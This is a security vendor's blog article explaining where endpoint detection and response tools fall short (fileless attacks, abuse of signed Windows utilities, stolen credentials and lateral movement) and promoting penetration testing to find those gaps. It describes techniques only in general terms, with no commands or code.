The EDR Promise and Its Limits
EDR transformed endpoint security. Instead of static signature matching, modern EDR platforms use behavioral analysis, machine learning and telemetry correlation to detect threats in real time. CrowdStrike, SentinelOne, Microsoft Defender for Endpoint, Carbon Black and Cortex XDR represent billions of dollars in research and engineering.
They are genuinely good at what they do. They catch malware, flag suspicious process chains and provide incident response teams with the telemetry needed to reconstruct attacks. For the threats they are designed to detect, they work.
The problem is the threats they are not designed to detect.
Blind Spot 1: Fileless Attacks
Traditional malware drops an executable to disk, which gives EDR something to scan, hash and analyze. Fileless attacks skip this step entirely. They execute code in memory using legitimate interpreters like PowerShell, WMI, VBScript or .NET reflection. No file is written. No executable appears on the filesystem.
EDR vendors have improved their fileless detection significantly, but the fundamental challenge remains. When malicious code runs inside a legitimate process using legitimate scripting interfaces, the behavioral signals are subtle. An obfuscated PowerShell command that downloads and executes code in memory produces telemetry that can look similar to legitimate administrative automation.
Sophisticated attackers tune their fileless payloads to minimize behavioral indicators. They avoid common patterns that EDR looks for, use legitimate encoding methods instead of suspicious obfuscation and execute in short bursts that limit the time available for behavioral analysis to trigger.
Blind Spot 2: Living-off-the-Land Binaries (LOLBins)
LOLBins are legitimate system tools that can be abused for malicious purposes. Certutil can download files. Mshta can execute scripts. Regsvr32 can load remote code. Rundll32 can execute arbitrary DLLs. Bitsadmin can download payloads. These are Microsoft-signed binaries that ship with every Windows installation.
EDR faces a fundamental dilemma with LOLBins. These tools are used legitimately by system administrators, software installers and management platforms every day. Blocking them breaks legitimate operations. Alerting on every use generates overwhelming noise. The result is that EDR vendors must set detection thresholds that inevitably allow some malicious use to pass through.
Attackers know exactly where these thresholds are. They test their techniques against the major EDR platforms before deploying them in real attacks. If certutil is flagged when used with certain command-line arguments, they use different arguments that achieve the same result. The cat-and-mouse game never ends, and the attacker has the advantage of choosing when and how to engage.
Blind Spot 3: Credential-Based Attacks
When an attacker steals valid credentials and uses them to log into systems normally, there is nothing for EDR to detect at the endpoint level. The authentication is legitimate. The session is legitimate. The access patterns are legitimate. From the endpoint's perspective, an authorized user is performing authorized actions.
Credential attacks take many forms. Kerberoasting extracts service account password hashes from Active Directory. Pass-the-hash reuses captured NTLM hashes without knowing the actual password. Token manipulation steals authentication tokens from memory. Social engineering or phishing captures credentials directly from users.
Once an attacker has valid credentials, they can access email, file shares, applications and administrative consoles without triggering endpoint-level detection. The attack looks like normal work. Because from the endpoint's perspective, it is normal work. The problem is that the person doing the work is not who the system thinks they are.
Blind Spot 4: Lateral Movement Through Legitimate Protocols
After gaining initial access, attackers move laterally through the network to reach higher-value targets. They use the same protocols that legitimate administrators use: SMB for file access, RDP for remote desktop, WinRM for remote management, SSH for Linux systems and DCOM for distributed application communication.
EDR agents monitor the endpoint they are installed on. They have limited visibility into network-level activity between endpoints. When an attacker moves from Workstation A to Server B using RDP with valid credentials, the EDR agent on Server B sees a legitimate RDP session initiated by an authorized account. There is no malware, no exploit, no suspicious process. Just an admin logging in.
Network detection tools like Darktrace and other NDR platforms can provide some visibility into lateral movement, but they face their own limitations with encrypted traffic and traffic that mimics normal patterns.
EDR Is Your Immune System. A Pentest Is the Stress Test.
This analogy captures the relationship precisely. Your immune system runs continuously, catching threats automatically and responding to infections in real time. It is essential. You would not survive without it.
But your immune system does not tell you about the threats it cannot detect. Autoimmune conditions, cancer cells that evade immune recognition, dormant infections that hide below the immune response threshold. You need diagnostic tests, screenings and external examination to find what the immune system misses.
A penetration test is that diagnostic examination for your security infrastructure. It does not replace EDR. It tests EDR. It reveals the specific gaps in your specific deployment. It tells you not just that gaps exist in theory, but exactly where they are in your environment and exactly what an attacker could achieve by exploiting them.
What a Pentest Reveals That EDR Cannot
When we conduct a penetration test against an environment with EDR deployed, we document three things:
What EDR detected. This validates that your EDR deployment is working correctly for the threats it is designed to catch. If your EDR misses techniques it should detect, that indicates a configuration or deployment issue that needs immediate attention.
What EDR missed. These are the techniques that successfully bypassed detection. They represent the real gaps in your endpoint security posture. Each missed technique is a pathway that a real attacker could exploit.
What EDR could not possibly detect. Credential-based attacks, trust architecture gaps, network-level issues and configuration weaknesses that exist outside EDR's monitoring scope. These findings require compensating controls beyond endpoint detection.
This three-part analysis gives security teams a complete picture. Not just what EDR catches, but what it misses and why. That information drives investment decisions about compensating controls, detection engineering and architectural improvements.
The Bottom Line
EDR is necessary. It is not sufficient. If your security strategy assumes that EDR catches everything, you have a blind spot the size of every technique in this article. The only way to quantify that blind spot is to test it.
At Sherlock Forensics, every network penetration test includes EDR evasion testing as a standard component. We do not test in a lab. We test against your actual deployment, with your actual configuration, in your actual environment. The result is proof, not theory.